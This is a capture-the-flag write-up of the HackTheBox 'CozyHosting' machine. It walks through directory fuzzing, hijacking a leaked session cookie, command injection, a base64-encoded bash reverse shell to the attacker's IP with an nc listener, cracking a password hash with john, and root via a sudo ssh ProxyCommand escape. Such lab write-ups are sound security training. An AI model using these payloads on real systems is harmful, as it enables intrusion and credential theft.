Skip to main content
HTB: CozyHosting
  1. Posts/

HTB: CozyHosting

·451 words·3 mins
CTF Easy Linux Cookie
Table of Contents

Introduction
#

CozyHosting is an easy Linux box on HackTheBox based around cookie abuse, command injection, and heavy use of burp.

Recon
#

nmap
# 

nmap -sV -sC -Pn -p- --min-rate=1000 10.129.110.116
nmap

We found 2 open ports, the usual combo of ssh port 22 and web on port 80. We cant access website quite yet, it throws error at us, so let’s add the ip to /etc/hosts and try to access again.

hosts

Site Exploration
#

web

There is nothing interesting on this page apart from the login button. So let’s try to fuzz the directories enabled on this site.

dirsearch -u http://cozyhosting.htb/
dirsearch

We found few interesting things, /admin unfortunately redirects back to login but there are more interesting options under /actuator.

In the /actuator/sessions we can see session cookies of previous logins, one with its username.

actuator

Log in
#

Using burp we can capture out login attempt and switch the JSESSIONID for the one we found earlier.

Be careful, the session ID is on a timer so you may need to refresh before use
actuator

With that we are in!

web_in

On the bottom of a page there is a form that serves as a ssh connection. Using burp we can intercept the request again and change the values to anything we want.

web_in

Reverse Shell
#

There are many way to get the reverse shell now.

Try THIS useful website.

echo "bash -i >& /dev/tcp/{YOUR_IP}/{YOUR_PORT} 0>&1" | base64 -w 0
echo "{PAYLOAD}"|base64 -d|bash
payload

Just dont forget to URL-encode whatever you choose (Ctrl+U)

Start nc listener

nc -lvnp 4444

and send the request.

requst

Now make the shell stable.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
ctrl + z
stty raw -echo; fg

Exploration
#

There is .jar file we can use. Run a python server

python3 -m http.server 4444

and download it to your machine.

wget http://10.129.110.116:4444/cloudhosting-0.0.1.jar

Now open it using jd-gui and see what we got.

jd-gui
jd-gui

With the password we found inside we can log into the database.

psql -h 127.0.0.1 -U postgres
database

When we select all users we can see hashed password for admin account.

John
#

Now we can use john to crack the password

john password_hash.txt --wordlist=rockyou.txt
john

With the newly found password and the username we got from /etc/passwd

passwd

we can use the ssh port we found in the beginning.

SSH in
#

ssh

… and grab the flag!

Privilege Escalation
#

We can use sudo -l to list the allowed commands for the user.

Here we found that our user can may run the (root) /usr/bin/ssh * command on localhost, which will give us root privileges.

jsudo

Just check out GTFOBINS for the command.

ssh -o ProxyCommand=';sh 0<&2 1>&2' x
jprivesc

and it is done!

Now grab the flag and have a nice day!

Author
~